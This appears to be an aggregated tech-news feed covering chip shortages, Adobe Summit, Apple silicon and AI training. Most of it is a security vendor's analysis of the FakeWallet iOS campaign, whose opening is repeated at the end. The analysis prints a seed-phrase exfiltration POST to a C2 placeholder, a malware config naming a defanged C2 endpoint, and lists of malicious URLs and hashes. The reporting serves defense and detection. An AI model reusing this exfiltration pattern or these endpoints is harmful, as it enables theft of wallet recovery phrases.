Kategorie

The ongoing shortage of memory chips looks likely to continue throughout the year as demand from the AI sector surges. According to Nikkei Asia, leading manufacturers are expected to be able to meet only about 60% of global demand despite expansion plans.

Although new factories are on the way, several of them are not expected to reach full production until 2027 at the earliest. Even once those facilities are up and running, additional time will be required to scale up to efficient production levels.

An annual production increase of around 12% would be needed to catch up with demand, analysts said, though current plans are significantly lower. The balance between supply and demand for memory is not expected to normalize until 2028.

Because of the shortage, memory prices have risen by approximately 90% during the first quarter of 2026.

The Seiko USA website was defaced over the weekend, displaying a message from attackers claiming they stole its Shopify customer database and threatening to leak it unless a ransom is paid. [...]

Adobe Summit serves as a platform for Adobe to introduce new services, capabilities, and enhancements to its portfolio of creative and marketing software and services. The 2026 edition kicks off live in Las Vegas on April 20, with a virtual event running alongside it.

The company has long been a name to watch as a developer of creativity and design software. This year will be a pivotal one for Adobe, with the recent announcement that its CEO is stepping down after 18 years at the helm, and the rise of AI tools challenging both creators and the software vendors that serve them. Expect announcements setting out Adobe’s response to those challenges — and watch for signs that the company may be changing direction or losing ground to AI offerings from companies such as Microsoft, OpenAI, or Google.

Adobe is also one of the bigger players in the enterprise digital marketing solutions, and Adobe Summit will also provide insights into changes to Adobe Marketing Cloud and Adobe Experience Platform.

Follow this page (and this one) for the latest news and insights from Adobe 2026, and check out recent related coverage below.

Adobe news and analysis Adobe bets on agentic AI to rewrite SaaS for customer experience

April 20, 2026: Adobe is shifting its approach to what it calls ‘Customer Experience Orchestration (CXO).’ Announced today at Adobe Summit, the new Adobe CX Enterprise suite is a pivot to a future defined by agents rather than by software alone, where SaaS companies claim an advantage based on their deep domain expertise and troves of first- and third-party data.

The top priority for Adobe’s next CEO? Prepping for the ‘age of agents’

April 9, 2026: Adobe CEO Shantanu Narayen announced plans to step down last month after 18 years leading software vendor. For whomever is tapped next for the top job — the CEO search is expected to take several months — the biggest priority will almost certainly be reshaping Adobe’s products and strategy for the next wave of agentic AI, analysts said.

Adobe Acrobat Standard review: A polished PDF editor with clear limits

March 16, 2026: Adobe Acrobat Standard is Adobe’s entry paid-tier PDF editor, sitting between the free Acrobat Reader and the more fully featured Acrobat Pro. It’s meant for people who need more than viewing, signing, and basic annotations, but not Adobe’s full set of advanced document tools. It handles routine PDF work well, but advanced features still require a move up to Pro.

Adobe CEO steps down after 18 years

March 13, 2026: It’s all change at the top for Adobe as CEO Shantanu Narayen is stepping down after 18 years. He will relinquish the role as soon as a successor has been found, although he will continue to serve as chairman. The creative software company’s new boss will have to face the challenge of AI.

Adobe makes Agent Orchestrator and AI agents generally available

September 10, 2025: Adobe has launched AEP Agent Orchestrator and six AI agents for building, delivering, and optimizing customer experiences and marketing campaigns. Agent Composer, coming soon, will aid with customizing and configuring agents.

Adobe Commerce and Magento users: Patch critical SessionReaper flaw now

September 10, 2025: Adobe issued an emergency patch for one of the most severe vulnerabilities ever discovered in the Magento Open Source ecommerce platform and Adobe Commerce, its enterprise counterpart. The flaw allows unauthenticated attackers to hijack user accounts and, in some cases, execute arbitrary code on servers. Security experts warn of exploits soon.

Adobe is developing an agent to integrate Adobe Express with Microsoft 365

March 20, 2025: Adobe is working with Microsoft to develop an AI agent that can generate graphics and design content from within the Microsoft 365 interface. The Adobe Express Agent, still under development, will allow users to create and embed graphics directly within productivity applications such as Word and PowerPoint.

Adobe makes agentic AI push with Agent Orchestrator, purpose-built agents

March 18, 2025: Adobe unveiled Agent Orchestrator, a new capability for Adobe Experience Platform (AEP) to supervise AI agents, whether from Adobe or third-party ecosystems. It also introduced 10 new agents built on the capability at Adobe Summit 2025.

Apple Silicon has another big journey to take, one that means Apple will probably be the first to introduce 1.4- and 1-nanometer chips inside its systems. If that happens, Macs, iPhones, and iPads will continue to lead the industry in performance per watt.

Why do I say this? Mainly because reports claim TSMC is working to build sub 1nm chips by 2029 — and Apple remains that company’s most important customer, despite competition from AI server manufacturers today.

Demand for AI servers could yet slow, given the looming energy crisis and the trend toward on-prem and edge AI services. I don’t think the current level of investment in AI is sustainable, which is why I think Apple will continue to be TSMC’s lead customer once that bubble, inevitably, bursts.

What’s happening at TSMC?

The latest news is that TSMC intends to begin trial production of its sub-1nm A10 process tech by 2029, setting up Apple to be the first big company to use these new processors inside its hardware when volume production begins. 

What’s interesting is that this move to 1nm isn’t just about making transistors smaller, but also about ensuring close integration between chips, memory, and energy systems. A report in 2021 said TSMC was able to reach 1nm by using bismuth instead of silicon in the design.

Apple, of course, already works very, very hard to integrate those different elements on its existing processors, which is why it delivers better performance at lower wattage than competitors. That integration means its systems can accomplish a great deal more from lower quantities of memory, which helps protect the company’s margins against rapidly accelerating RAM prices. 

We currently expect up to 30% improvement in both performance and power efficiency from these new chip designs. That implies that iPhone Pro models introduced in 2030 (or possibly 2031) will be powered by these new chips.

Apple’s silicon road map seems secure

TSMC is expected to introduce 1.6nm chips in the next 18 months, though Apple might choose to skip that iteration to guarantee a leadership position once the 1.4nm TSMC process hits in 2028. That iteration will deliver yet another big speed and performance boost to Apple’s devices, with Apple becoming the first PC, tablet, or smartphone manufacturer to ship 1.4nm systems at scale. 

What benefits can we expect? During TSMC’s 2025 North American Symposium the company said 1.4nm chips should be 15% faster and consume around 30% less power than the processors inside Apple’s current devices. That’s all good, but it is also interesting to note that the iPhone 17 series hasn’t even made the leap to 2nm as yet, with Apple using TSMC’s N3P process. So, the company has lots of scope to secure the future of Apple Silicon.

Where next for Apple’s chips?

If it is correct that Apple will skip TSMC’s 1.6nm process and then climb aboard the 1.4nm and 1nm chips, we could see the two big processor development chapters between now and 2030. This year we can see it introduce 2nm chips, with 1.4nm to follow probably in 2028 and the huge leap to sub-1nm processors to follow in 2030-31.

As these chips will be deployed across Apple’s hardware platforms, including within new designs we don’t know about yet, it means you can anticipate highly significant performance gains wherever in the ecosystem you happen to sit. Whether you’re looking at the next-generation MacBook Neo, MacBook Pro, iPhone or iPhone e, you’ll see impressive performance gains unlocked in all into the last half of this decade. 

Those performance gains, combined with improved energy consumption, allows Apple’s hardware designers to work towards thinner, lighter and smaller devices in a range of design configurations — some of which could not have existed before. (Think about spectacles with the kind of performance you once got from a Mac.) The way ahead is clear. Apple has a wide open road for chip design, and while tensions between today’s US and China could derail some of these plans, TSMC’s continued investment in fabrication capacity in the US might help mitigate against even that potential calamity.

You can follow me on social media! Join me on BlueSky,  LinkedIn, Mastodon, and MeWe. 

Microsoft is warning of threat actors increasingly abusing external Microsoft Teams collaboration and relying on legitimate tools for access and lateral movement on enterprise networks. [...]

Backups protect data, but don't keep your business running during downtime. Datto shows why BCDR is essential to keep operations running during ransomware and outages. [...]

Monday’s recap shows the same pattern in different places. A third-party tool becomes a way in, then leads to internal access. A trusted download path is briefly swapped to deliver malware. Browser extensions act normally while pulling data and running code. Even update channels are used to push payloads. It’s not breaking systems—it’s bending trust. There’s also a shift in how attacks run. Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]

A British man, believed to be the leader of the Scattered Spider cybercrime collective, has pleaded guilty in the United States to charges of wire fraud and aggravated identity theft. [...]

Microsoft is rolling out multiple File Explorer changes to Windows 11 users in the Insider program, including improvements to launch speed and performance. [...]

The fastest way to fall in love with an AI tool is to watch the demo. Everything moves quickly. Prompts land cleanly. The system produces impressive outputs in seconds. It feels like the beginning of a new era for your team. But most AI initiatives don't fail because of bad technology. They stall because what worked in the demo doesn't survive contact with real operations. The gap between a [email protected]

Enterprises have spent the past two years rushing to make their workforces “AI-ready.” But many early training programs — focused on prompt writing and chatbot skills — are proving poorly suited to the realities of AI-powered work.

The reason is simple: the skills that matter most once AI enters real workflows have less to do with interacting with tools and more to do with judgment. The durable capabilities emerging in the AI era include output validation, data literacy, process understanding, and the ability to challenge automated recommendations. Tool-specific skills, by contrast, tend to age quickly as models and interfaces evolve.

“AI-ready is not defined by how many people took training or how many licenses you bought,” said Neal Sample, executive vice president and chief digital and technology officer at electronics retailer Best Buy. “It’s defined by whether you have redesigned real workflows, assigned accountability, and can show the technology is improving outcomes without introducing unmanaged risk.”

That shift — from tool proficiency to operational judgment — is forcing enterprises to rethink how they train employees for AI.

The illusion of AI readiness

The first wave of corporate AI training focused heavily on prompt engineering and basic familiarity with generative AI tools. That approach made sense early on, when employees needed help understanding the technology. But many organizations are discovering those skills have a short half-life.

“Prompt engineering aged the fastest,” said Rebecca Schalber, senior manager for generative AI at cosmetics company cosnova Beauty. As new models and interfaces appear, the effort invested in crafting perfect prompts quickly becomes obsolete.

When cosnova rolled out generative AI across its workforce, Schalber expected training to center on individual capability — understanding large language models, learning prompting techniques, and experimenting with tools. Early adoption looked promising. Within six months, a survey showed employees reporting productivity gains of nearly 10%.

Adoption alone was not enough. “You need broad adoption to move the needle,” Schalber said. “But what really matters is the workflow design.”

Instead of focusing on prompts, cosnova began examining how work actually happens inside teams — what tasks employees perform, where friction exists, and which parts of a workflow could be safely automated or augmented by AI. That shift forced employees to confront a different question: not how to use AI, but how to verify its output and integrate it into real business processes.

When AI hits real workflows

The distinction becomes clear once AI leaves experimental environments and enters operational workflows. In testing, outputs can be compared against known answers. In real business processes, however, the answer often isn’t known in advance. AI systems are deployed precisely because they help employees analyze complex situations, interpret data, or generate insights.

That’s where human oversight becomes critical. “Human oversight is not second-guessing every output from the AI,” said Sample from Best Buy. “It means being explicit about where judgment, escalation, and accountability must remain human.”

The closer a decision comes to customer trust, regulatory obligations, or significant financial risk, the more important that judgment becomes. Organizations deploying AI at scale must build guardrails into workflows and clearly define who is responsible for final decisions.

“For every AI-enabled workflow, you need to know who owns the decision, who handles exceptions, and where a human must intervene before the business takes action,” Sample said.

In other words, the challenge of AI readiness is not teaching employees to interact with a model — it’s teaching them how to supervise it.

From training programs to workflow design

At cosnova, Schalber’s team moved away from generic training sessions toward hands-on workshops where managers and employees map their daily workflows. During these sessions, teams identify tasks that could benefit from AI support and then redesign processes around those opportunities.

When AI was introduced as simply another tool, enthusiasm was limited. But when employees saw how the technology could remove tedious tasks or reduce friction in their work, adoption accelerated.

“It was no longer just another tool that management wanted people to use,” Schalber said. Instead, teams were solving their own problems — removing repetitive tasks or speeding up processes they disliked.

The company also began emphasizing transferable skills that apply across AI tools and models, including critical thinking, workflow design, and data literacy. These capabilities remain valuable even as the technology evolves and have proven far more durable than prompt-writing techniques.

Experimentation before formal training

Some organizations are taking a different approach: encouraging experimentation first and formal training later. At AI infrastructure company Turing, Taylor Bradley, vice president of talent strategy, deliberately began the company’s AI upskilling effort by encouraging non-technical employees to experiment with generative AI tools.

The goal was to spark curiosity rather than enforce compliance. Bradley compares the process to teaching his daughter to ride a bicycle. “The best way for her to learn was to actually have her ride the bike,” he said.

At Turing, employees experimented with AI through informal activities such as turning photos of pets into “royal portraits” or creating short AI-generated films for internal competitions. The exercises were designed to lower the barrier to experimentation. Once employees became comfortable with the technology, the company introduced practical workshops focused on real work tasks.

Bradley now sits down with teams to examine daily workflows and identify where generative AI could help. Employees often discover that AI can serve as a sounding board for ideas, a drafting assistant, or a way to accelerate communication.

Within weeks, those experiments often evolve into more formal systems. One early project began as a conversational tool helping HR specialists draft responses to employee support tickets before expanding into a broader internal knowledge system.

The key metric, Bradley said, is not course completion but whether teams develop useful AI applications. “We focus on quality use cases with measurable outcomes,” he said.

Learning inside the flow of work

For large enterprises, the challenge of AI skill development is even more complex. Traditional training models — where employees attend courses and then return to their jobs — are poorly suited to technology evolving as quickly as generative AI.

According to Margaret Burke, talent acquisition and development leader at professional services firm PwC, traditional training programs are inherently episodic. “Employees attend a course, return to work, and may or may not apply what they learned,” she said. “In an AI-accelerating environment, that model breaks down.”

PwC is embedding AI learning directly into everyday work. The firm still runs formal programs but is expanding apprenticeship-style learning and weaving AI capability development into routine business activities.

One example is the company’s “skills days,” where employees explore AI applications relevant to their work. During a recent session with advisory associates, participants documented how they were already using AI — or where they planned to apply it. Hundreds of ideas emerged. PwC then used AI to analyze the inputs, clustering them into categories and redistributing the results across the organization so teams could learn from one another.

Crucially, PwC pairs technical AI capabilities with what Burke calls “human edge” skills, including critical thinking, independent judgment, and storytelling. “We never teach an AI technical skill without teaching the human skill that goes with it,” Burke said.

As AI systems generate more content and analysis, those human capabilities become essential for interpreting results, spotting errors, and explaining insights to colleagues and clients.

Measuring real AI readiness

As organizations rethink AI capability, the metrics used to evaluate training programs are changing. Traditional learning programs often rely on course completion rates or certifications. But those metrics reveal little about whether employees can use AI responsibly inside real workflows.

Instead, organizations are looking for operational signals. Some track how frequently employees develop new AI use cases that improve productivity or decision-making. Others measure how quickly teams adapt when AI tools or models change.

For Bradley at Turing, the key indicator is whether employees continually find new ways to improve their work with AI. “If my team members come to me every week with ideas for improving or expanding AI use cases, that’s the signal that capability is growing,” he said.

From the CIO perspective, however, the ultimate measure is operational outcomes. AI readiness only becomes meaningful when organizations integrate AI into real workflows while maintaining accountability for the results.

“The most durable capabilities are not the current best prompt tricks,” said Best Buy’s Sample. “They are judgment, problem framing, systems thinking, and the ability to translate machine output into business action.”

But for CIOs deploying AI across the enterprise, workforce capability is only part of the equation. Organizations must also rethink how leadership defines accountability when AI systems influence decisions.

“An AI-ready workforce without an AI-ready leadership model is likely to stall,” Sample said. “AI can accelerate analysis and recommendations, but accountability doesn’t transfer to the model. Leaders still have to define guardrails, decision rights, and what success looks like.”

As enterprises move beyond early AI experimentation, that leadership clarity may prove just as important as any skill employees learn.

Related reading:

• What AI skills job seekers need to develop in 2026
• 5 things IT managers get wrong about upskilling tech teams
• Two-thirds of jobs will be impacted by AI
• How to keep tech workers engaged in the age of AI
• How to train an AI-enabled workforce — and why you need to

Cybersecurity researchers have discovered a critical "by design" weakness in the Model Context Protocol's (MCP) architecture that could pave the way for remote code execution and have a cascading effect on the artificial intelligence (AI) supply chain. "This flaw enables Arbitrary Command Execution (RCE) on any system running a vulnerable MCP implementation, granting attackers direct access toRavie Lakshmananhttp://www.blogger.com/profile/[email protected]

Microsoft has reverted a recent service update that was preventing some customers from launching the Microsoft Teams desktop client. [...]

In March 2026, we uncovered more than twenty phishing apps in the Apple App Store masquerading as popular crypto wallets. Once launched, these apps redirect users to browser pages designed to look similar to the App Store and distributing trojanized versions of legitimate wallets. The infected apps are specifically engineered to hijack recovery phrases and private keys. Metadata from the malware suggests this campaign has been flying under the radar since at least the fall of 2025.

We’ve seen this happen before. Back in 2022, ESET researchers spotted compromised crypto wallets distributed through phishing sites. By abusing iOS provisioning profiles to install malware, attackers were able to steal recovery phrases from major hot wallets like Metamask, Coinbase, Trust Wallet, TokenPocket, Bitpie, imToken, and OneKey. Fast forward four years, and the same crypto-theft scheme is gaining momentum again, now featuring new malicious modules, updated injection techniques, and distribution through phishing apps in the App Store.

Kaspersky products detect this threat as HEUR:Trojan-PSW.IphoneOS.FakeWallet.* and HEUR:Trojan.IphoneOS.FakeWallet.*.

Technical details Background

This past March, we noticed a wave of phishing apps topping the search results in the Chinese App Store, all disguised as popular crypto wallets. Because of regional restrictions, many official crypto wallet apps are currently unavailable to users in China, specifically if they have their Apple ID set to the Chinese region. Scammers are jumping on this opportunity. They’ve launched fake apps using icons that mirror the originals and names with intentional typos – a tactic known as typosquatting – to slip past App Store filters and increase their chances of deceiving users.

App Store search results for “Ledger Wallet” (formerly Ledger Live)

In some instances, the app names and icons had absolutely nothing to do with cryptocurrency. However, the promotional banners for these apps claimed that the official wallet was “unavailable in the App Store” and directed users to download it through the app instead.

Promotional screenshots from apps posing as the official TokenPocket app

During our investigation, we identified 26 phishing apps in the App Store mimicking the following major wallets:

• MetaMask
• Ledger
• Trust Wallet
• Coinbase
• TokenPocket
• imToken
• Bitpie

We’ve reported all of these findings to Apple, and several of the malicious apps have already been pulled from the store.

We also identified several similar apps that didn’t have any phishing functionality yet, but showed every sign of being linked to the same threat actors. It’s highly likely that the malicious features were simply waiting to be toggled on in a future update.

The phishing apps featured stubs – functional placeholders that mimicked a legitimate service – designed to make the app appear authentic.  The stub could be a game, a calculator, or a task planner.

However, once you launched the app, it would open a malicious link in your browser. This link kicks off a scheme leveraging provisioning profiles to install infected versions of crypto wallets onto the victim’s device. This technique isn’t exclusive to FakeWallet; other iOS threats, like SparkKitty, use similar methods. These profiles come in a few flavors, one of them being enterprise provisioning profiles. Apple designed these so companies could create and deploy internal apps to employees without going through the App Store or hitting device limits. Enterprise provisioning profiles are a favorite tool for makers of software cracks, cheats, online casinos, pirated mods of popular apps, and malware.

An infected wallet and its corresponding profile used for the installation process

Malicious modules for hot wallets

The attackers have churned out a wide variety of malicious modules, each tailored to a specific wallet. In most cases, the malware is delivered via a malicious library injection, though we’ve also come across builds where the app’s original source code was modified.

To embed the malicious library, the hackers injected load commands into the main executable. This is a standard trick to expand an app’s functionality without a rebuild. Once the library is loaded, the dyld linker triggers initialization functions, if present in the library. We’ve seen this implemented in different ways: sometimes by adding a load method to specific Objective-C classes, and other times through standard C++ functions.

The logic remains the same across all initialization functions: the app loads or initializes its configuration, if available, and then swaps out legitimate class methods for malicious versions. For instance, we found a malicious library named libokexHook.dylib embedded in a modified version of the Coinbase app. It hijacks the original viewDidLoad method within the RecoveryPhraseViewController class, the part of the code responsible for the screen where the user enters their recovery phrase.

A code snippet where a malicious initialization function hijacks the original viewDidLoad method of the class responsible for the recovery phrase screen

The compromised viewDidLoad method works by scanning the screen in the current view controller (the object managing that specific app screen) to hunt for mnemonics – the individual words that make up the seed phrase. Once it finds them, it extracts the data, encrypts it, and beams it back to a C2 server. All these malicious modules follow a specific process to exfiltrate data:

• The extracted mnemonics are stringed together.
• This string is encrypted using RSA with the PKCS #1 scheme.
• The encrypted data is then encoded into Base64.
• Finally, the encoded string – along with metadata like the malicious module type, the app name, and a unique identification code – is sent to the attackers’ server.

The malicious viewDidLoad method at work, scraping seed phrase words from individual subviews

In this specific variant, the C2 server address is hardcoded directly into the executable. However, in other versions we’ve analyzed, the Trojan pulls the address from a configuration file tucked away in the app folder.

The POST request used to exfiltrate those encrypted mnemonics looks like this:

POST <c2_domain>/api/open/postByTokenPocket?ciyu=<base64_encoded_encrypted_mnemonics>&code=10001&ciyuType=1&wallet=ledger

The version of the malicious module targeting Trust Wallet stands out from the rest. It skips the initialization functions entirely. Instead, the attackers injected a custom executable section, labeled __hook, directly into the main executable. They placed it right before the __text section, specifically in the memory region usually reserved for load commands in the program header. The first two functions in this section act as trampolines to the dlsym function and the mnemonic validation method within the original WalletCore class. These are followed by two wrapper functions designed to:

• Resolve symbols dataInit or processX0Parameter from the malicious library
• Hand over control to these newly discovered functions
• Execute the code for the original methods that the wrapper was built to replace

The content of the embedded __hook section, showing the trampolines and wrapper functions

These wrappers effectively hijack the methods the app calls whenever a user tries to restore a wallet using a seed phrase or create a new one. By following the same playbook described earlier, the Trojan scrapes the mnemonics directly from the corresponding screens, encrypts them, and beams them back to the C2 server.

The Ledger wallet malicious module

The modules we’ve discussed so far were designed to rip recovery phrases from hot wallets – apps that store and use private keys directly on the device where they are installed. Cold wallets are a different beast: the keys stay on a separate, offline device, and the app is just a user interface with no direct access to them. To get their hands on those assets, the attackers fall back on old-school phishing.

We found two versions of the Ledger implant, one using a malicious library injection and another where the app’s source code itself was tampered with. In the library version, the malware sneaks in through standard entry points:  two Objective-C initialization functions (+[UIViewController load] and +[UIView load]) and a function named entry located in the __mod_init_functions section. Once the malicious library is loaded into the app’s memory, it goes to work:

• The entry function loads a configuration file from the app directory, generates a user UUID, and attempts to send it to the server specified by the login-url The config file looks like this:
  { "url": "hxxps://iosfc[.]com/ledger/ios/Rsakeycatch.php", // C2 for mnemonics "code": "10001", // special code "login-url": "hxxps://xxx[.]com", "login-code": "88761" }
• Two other initialization functions, +[UIViewController load] and +[UIView load], replace certain methods of the original app classes with their malicious payload.
• As soon as the root screen is rendered, the malware traverses the view controller hierarchy and searches for a child screen named add-account-cta or one containing a $ sign:
  • If it is the add-account-cta screen, the Trojan identifies the button responsible for adding a new account and matches its text to a specific language. The Trojan uses this to determine the app’s locale so it can later display a phishing alert in the appropriate language. It then prepares a phishing notification whose content will require the user to pass a “security check”, and stores it in an object of GlobalVariables
  • If it’s a screen with a $ sign in its name, the malware scans its content using a regular expression to extract the wallet balance and attempt to send this balance information to a harmless domain specified in the configuration as login-url. We assume this is outdated testing functionality left in the code by mistake, as the specified domain is unrelated to the malware.
• Then, when any screen is rendered, one of the malicious handlers checks its name. If it is the screen responsible for adding an account or buying/selling cryptocurrency, the malware displays the phishing notification prepared earlier. Clicking on this notification opens a WebView window, where the local HTML file html serves as the page to display.

The verify.html phishing page prompts the user to enter their mnemonics. The malware then checks the seed phrase entered by the user against the BIP-39 dictionary, a standard that uses 2048 mnemonic words to generate seed phrases. Additionally, to lower the victim’s guard, the phishing page is designed to match the app’s style and even supports autocomplete for mnemonics to project quality. The seed phrase is passed to an Objective-C handler, which merges it into a single string, encrypts it using RSA with the PKCS #1 scheme, and sends it to the C2 server along with additional data – such as the malicious module type, app name, and a specific config code – via an HTTP POST request to the /ledger/ios/Rsakeycatch.php endpoint.

The Objective-C handler responsible for exfiltrating mnemonics

The second version of the infected Ledger wallet involves changes made directly to the main code of the app written in React Native. This approach eliminates the need for platform-specific libraries and allows attackers to run the same malicious module across different platforms. Since the Ledger Live source code is publicly available, injecting malicious code into it is a straightforward task for the attackers.
The infected build includes two malicious screens:

• MnemonicVerifyScreen, embedded in PortfolioNavigator
• PrivateKeyVerifyScreen, embedded in MyLedgerNavigator

In the React Native ecosystem, navigators handle switching between different screens. In this case, these specific navigators are triggered when the Portfolio or Device List screens are opened. In the original app, these screens remain inaccessible until the user pairs their cold wallet with the application. This same logic is preserved in the infected version, effectively serving as an anti-debugging technique: the phishing window only appears during a realistic usage scenario.

Phishing window for seed phrase verification

The MnemonicVerifyScreen appears whenever either of those navigators is activated – whether the user is checking their portfolio or viewing info about a paired device. The PrivateKeyVerifyScreen remains unused – it is designed to handle a private key rather than a mnemonic, specifically the key generated by the wallet based on the entered seed phrase. Since Ledger Live doesn’t give users direct access to private keys or support them for importing wallets, we suspect this specific feature was actually intended for a different app.

Decompiled pseudocode of an anonymous malicious function setting up the configuration during app startup

Once a victim enters their recovery phrase on the phishing page and hits Confirm, the Trojan creates a separate thread to handle the data exfiltration. It tracks the progress of the transfer by creating three files in the app’s working directory:

• verify-wallet-status.json tracks the current status and the timestamp of the last update.
• verify-wallet-config.json stores the C2 server configuration the malware is currently using.
• verify-wallet-pending.json holds encrypted mnemonics until they’re successfully transmitted to the C2 server. Then the clearPendingMnemonicJob function replaces the contents of the file with an empty JSON dictionary.

Next, the Trojan encrypts the captured mnemonics and sends the resulting value to the C2 server. The data is encrypted using the same algorithm described earlier (RSA encryption followed by Base64 encoding). If the app is closed or minimized, the Trojan checks the status of the previous exfiltration attempt upon restart and resumes the process if it hasn’t been completed.

Decompiled pseudocode for the submitWalletSecret function

Other distribution channels, platforms, and the SparkKitty link

During our investigation, we discovered a website mimicking the official Ledger site that hosted links to the same infected apps described above. While we’ve only observed one such example, we’re certain that other similar phishing pages exist across the web.

A phishing website hosting links to infected Ledger apps for both iOS and Android

We also identified several compromised versions of wallet apps for Android, including both previously undiscovered samples and known ones. These instances were distributed through the same malicious pages; however, we found no traces of them in the Google Play Store.

One additional detail: some of the infected apps also contained a SparkKitty module. Interestingly, these modules didn’t show any malicious activity on their own, with mnemonics handled exclusively by the FakeWallet modules. We suspect SparkKitty might be present for one of two reasons: either the authors of both malicious campaigns are linked and forgot to remove it, or it was embedded by different attackers and is currently inactive.

Victims

Since nearly all the phishing apps were exclusive to the Chinese App Store, and the infected wallets themselves were distributed through Chinese-language phishing pages, we can conclude that this campaign primarily targets users in China. However, the malicious modules themselves have no built-in regional restrictions. Furthermore, since the phishing notifications in some variants automatically adapt to the app’s language, users outside of China could easily find themselves in the crosshairs of these attackers.

Attribution

According to our data, the threat actor behind this campaign may be linked to the creators of the SparkKitty Trojan. Several details uncovered during our research point to this connection:

• Some infected apps contained SparkKitty modules alongside the FakeWallet code.
• The attackers behind both campaigns appear to be native Chinese speakers, as the malicious modules frequently use log messages in Chinese.
• Both campaigns distribute infected apps via phishing pages that mimic the official App Store.
• Both campaigns specifically target victims’ cryptocurrency assets.

Conclusion

Our research shows that the FakeWallet campaign is gaining momentum by employing new tactics, ranging from delivering payloads via phishing apps published in the App Store to embedding themselves into cold wallet apps and using sophisticated phishing notifications to trick users into revealing their mnemonics. The fact that these phishing apps bypass initial filters to appear at the top of App Store search results can significantly lower a user’s guard. While the campaign is not exceptionally complex from a technical standpoint, it poses serious risks to users for several reasons:

• Hot wallet attacks: the malware can steal crypto assets during the wallet creation or import phase without any additional user interaction.
• Cold wallet attacks: attackers go to great lengths to make their phishing windows look legitimate, even implementing mnemonic autocomplete to mirror the real user experience and increase their chances of a successful theft.
• Investigation challenges: the technical restrictions imposed by iOS and the broader Apple ecosystem make it difficult to effectively detect and analyze malicious software directly on a device.

Indicators of compromise

Infected cryptowallet IPA file hashes
4126348d783393dd85ede3468e48405d
b639f7f81a8faca9c62fd227fef5e28c
d48b580718b0e1617afc1dec028e9059
bafba3d044a4f674fc9edc67ef6b8a6b
79fe383f0963ae741193989c12aefacc
8d45a67b648d2cb46292ff5041a5dd44
7e678ca2f01dc853e85d13924e6c8a45

Malicious dylib file hashes
be9e0d516f59ae57f5553bcc3cf296d1
fd0dc5d4bba740c7b4cc78c4b19a5840
7b4c61ff418f6fe80cf8adb474278311
8cbd34393d1d54a90be3c2b53d8fc17a
d138a63436b4dd8c5a55d184e025ef99
5bdae6cb778d002c806bb7ed130985f3

Malicious React Native application hash
84c81a5e49291fe60eb9f5c1e2ac184b

Phishing HTML for infected Ledger Live app file hash
19733e0dfa804e3676f97eff90f2e467

Malicious Android file hashes
8f51f82393c6467f9392fb9eb46f9301
114721fbc23ff9d188535bd736a0d30e

Malicious download links
hxxps://www.gxzhrc[.]cn/download/
hxxps://appstoreios[.]com/DjZH?key=646556306F6Q465O313L737N3332939Y353I830F31
hxxps://crypto-stroe[.]cc/
hxxps://yjzhengruol[.]com/s/3f605f
hxxps://6688cf.jhxrpbgq[.]com/6axqkwuq
hxxps://139.180.139[.]209/prod-api/system/confData/getUserConfByKey/
hxxps://xz.apps-store[.]im/s/iuXt?key=646Y563Y6F6H465J313X737U333S9342323N030R34&c=
hxxps://xz.apps-store[.]im/DjZH?key=646B563L6F6N4657313B737U3436335E3833331737
hxxps://xz.apps-store[.]im/s/dDan?key=646756376F6A465D313L737J333993473233038L39&c=
hxxps://xz.apps-store[.]im/CqDq?key=646R563V6F6Y465K313J737G343C3352383R336O35
hxxps://ntm0mdkzymy3n.oukwww[.]com/7nhn7jvv5YieDe7P?0e7b9c78e=686989d97cf0d70346cbde2031207cbf
hxxps://ntm0mdkzymy3n.oukwww[.]com/jFms03nKTf7RIZN8?61f68b07f8=0565364633b5acdd24a498a6a9ab4eca
hxxps://nziwytu5n.lahuafa[.]com/10RsW/mw2ZmvXKUEbzI0n
hxxps://zdrhnmjjndu.ulbcl[.]com/7uchSEp6DIEAqux?a3f65e=417ae7f384c49de8c672aec86d5a2860
hxxps://zdrhnmjjndu.ulbcl[.]com/tWe0ASmXJbDz3KGh?4a1bbe6d=31d25ddf2697b9e13ee883fff328b22f
hxxps://api.npoint[.]io/153b165a59f8f7d7b097
hxxps://mti4ywy4.lahuafa[.]com/UVB2U/mw2ZmvXKUEbzI0n
hxxps://mtjln.siyangoil[.]com/08dT284P/1ZMz5Xmb0EoQZVvS5
hxxps://odm0.siyangoil[.]com/TYTmtV8t/JG6T5nvM1AYqAcN
hxxps://mgi1y.siyangoil[.]com/vmzLvi4Dh/1Dd0m4BmAuhVVCbzF
hxxps://mziyytm5ytk.ahroar[.]com/kAN2pIEaariFb8Yc
hxxps://ngy2yjq0otlj.ahroar[.]com/EpCXMKDMx1roYGJ
hxxps://ngy2yjq0otlj.ahroar[.]com/17pIWJfr9DBiXYrSb

C2 addresses
hxxps://kkkhhhnnn[.]com/api/open/postByTokenpocket
hxxps://helllo2025[.]com/api/open/postByTokenpocket
hxxps://sxsfcc[.]com/api/open/postByTokenpocket
hxxps://iosfc[.]com/ledger/ios/Rsakeycatch.php
hxxps://nmu8n[.]com/tpocket/ios/Rsakeyword.php
hxxps://zmx6f[.]com/btp/ios/receiRsakeyword.php
hxxps://api.dc1637[.]xyz

In March 2026, we uncovered more than twenty phishing apps in the Apple App Store masquerading as popular crypto wallets. Once launched, these apps redirect users to browser pages designed to look similar to the App Store and distributing trojanized versions of legitimate wallets. The infected apps are specifically engineered to hijack recovery phrases and private keys. Metadata from the malware suggests this campaign has been flying under the radar since at least the fall of 2025.

We’ve seen this happen before. Back in 2022, ESET researchers spotted compromised crypto wallets distributed through phishing sites. By abusing iOS provisioning profiles to install malware, attackers were able to steal recovery phrases from major hot wallets like Metamask, Coinbase, Trust Wallet, TokenPocket, Bitpie, imToken, and OneKey. Fast forward four years, and the same crypto-theft scheme is gaining momentum again, now featuring new malicious modules, updated injection techniques, and distribution through phishing apps in the App Store.

Kaspersky products detect this threat as HEUR:Trojan-PSW.IphoneOS.FakeWallet.* and HEUR:Trojan.IphoneOS.FakeWallet.*.

Technical details Background

This past March, we noticed a wave of phishing apps topping the search results in the Chinese App Store, all disguised as popular crypto wallets. Because of regional restrictions, many official crypto wallet apps are currently unavailable to users in China, specifically if they have their Apple ID set to the Chinese region. Scammers are jumping on this opportunity. They’ve launched fake apps using icons that mirror the originals and names with intentional typos – a tactic known as typosquatting – to slip past App Store filters and increase their chances of deceiving users.

App Store search results for “Ledger Wallet” (formerly Ledger Live)

In some instances, the app names and icons had absolutely nothing to do with cryptocurrency. However, the promotional banners for these apps claimed that the official wallet was “unavailable in the App Store” and directed users to download it through the app instead.

Promotional screenshots from apps posing as the official TokenPocket app

During our investigation, we identified 26 phishing apps in the App Store mimicking the following major wallets:

• MetaMask
